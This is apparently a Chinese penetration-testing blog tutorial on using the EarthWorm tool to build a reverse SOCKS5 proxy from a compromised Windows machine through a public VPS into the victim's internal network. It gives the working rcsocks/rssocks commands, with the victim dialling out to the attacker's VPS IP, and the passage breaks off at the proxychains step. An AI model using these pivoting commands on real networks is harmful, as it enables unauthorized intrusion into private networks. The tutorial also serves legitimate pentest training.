标签 - 内网渗透

? EW ? ? EarthWorm ? ? 内网渗透 ?    2020-01-10 17:25:46    2016    0    0

基础知识

内网穿透工具:EW(EarthWorm)
下载地址: https://github.com/idlefire/ew

本文介绍:

  1. 如何使用EW做反向Socks5代理
  2. 浏览器如何设置Socks5代理访问目标内网Web服务
  3. 利用proxychains给终端设置Socks5代理(方便将本地命令行工具的流量代理进目标内网)

EW

基础环境

  1. Kali Linux(Attacker 内网 192.168.23.133)后面简称攻击机器
  2. Ubuntu 16.04.3(Attacker 公网 144.168.57.70)后面简称公网机器
  3. Windows 10(Victim 目标内网 10.74.155.39)后面简称目标机器

网络拓扑:Kali Linux是我本地的一台虚拟机,Ubuntu是公网上的一台 vps,Windows 10 是目标机器,内网IP,部分端口映射到外网,可以访问公网。

场景模拟

现在已拿到目标内网一台机器的权限(该机器将80端口映射至外网,Web服务存在漏洞,已拿到webshell)。需要对内网做进一步的渗透,目前我有一台公网的Ubuntu,一台内网的Kali,如何反向Socks5**将Kali的流量代理进目标内网**?

该使用场景为:
https://github.com/idlefire/ew

使用EW做反向Socks5代理

此处仅演示通过EW做反向Socks5代理,正向、多级级联的的代理方式可以参考官方文档。

第1步:在公网的Ubuntu上执行如下命令:

  1. ./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &

该命令的意思是说公网机器监听1080和1024端口。等待攻击者机器访问1080端口,目标机器访问1024端口。
公网 Ubuntu

第2步:目标机器执行如下命令:

  1. ew_for_Win.exe -s rssocks -d 144.168.57.70 -e 1024

其中-d参数的值为刚刚的公网IP。

Windows 10 目标机器:
Windows 10 目标机器
注意这里访问了 1024 端口。

第3步:攻击机器Kali通过proxychains或浏览器设置Socks5代理访问目标内网服务

方法一:Kali 浏览器设置Soc